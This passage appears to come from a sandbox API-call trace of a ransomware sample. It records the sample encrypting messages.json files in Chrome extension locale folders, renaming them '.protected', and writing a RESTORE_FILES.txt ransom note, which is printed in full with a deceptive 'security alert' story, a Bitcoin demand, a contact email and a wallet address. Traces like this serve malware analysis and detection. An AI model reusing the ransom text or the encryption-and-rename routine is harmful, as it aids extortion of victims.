data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.022] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.022] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.022] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.022] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.023] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.023] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.023] CloseHandle (hObject=0x164) returned 1 [0081.023] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0081.023] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0081.023] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi") returned 145 [0081.023] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0081.023] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0081.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*") returned 147 [0081.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.023] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.023] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.023] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.023] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\.") returned 147 [0081.023] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.023] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.024] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.024] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\..") returned 148 [0081.024] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.024] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.024] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.024] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.024] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.024] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.024] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.024] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.024] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.024] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.025] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json") returned 159 [0081.025] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.025] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2a1, lpOverlapped=0x0) returned 1 [0081.029] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.029] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2a1, lpOverlapped=0x0) returned 1 [0081.030] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.030] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.030] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.030] CloseHandle (hObject=0x168) returned 1 [0081.030] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected") returned 169 [0081.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.protected")) returned 1 [0081.031] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.031] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.031] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\RESTORE_FILES.txt") returned 163 [0081.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.031] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.031] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.032] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.032] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.032] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.032] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.033] CloseHandle (hObject=0x164) returned 1 [0081.033] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0081.033] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0081.033] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil") returned 146 [0081.033] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0081.033] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0081.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*") returned 148 [0081.033] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.033] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.033] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.033] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.033] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\.") returned 148 [0081.033] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.033] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.033] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.033] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.034] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.034] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.034] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\..") returned 149 [0081.034] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.034] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.034] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.034] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.034] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.034] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.034] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.034] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.034] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.035] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json") returned 160 [0081.035] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.035] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2b4, lpOverlapped=0x0) returned 1 [0081.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2b4, lpOverlapped=0x0) returned 1 [0081.037] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.037] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.037] CloseHandle (hObject=0x168) returned 1 [0081.037] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected") returned 170 [0081.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json.protected")) returned 1 [0081.038] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.038] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.038] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\RESTORE_FILES.txt") returned 164 [0081.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.039] lstrlenA (lpString="! 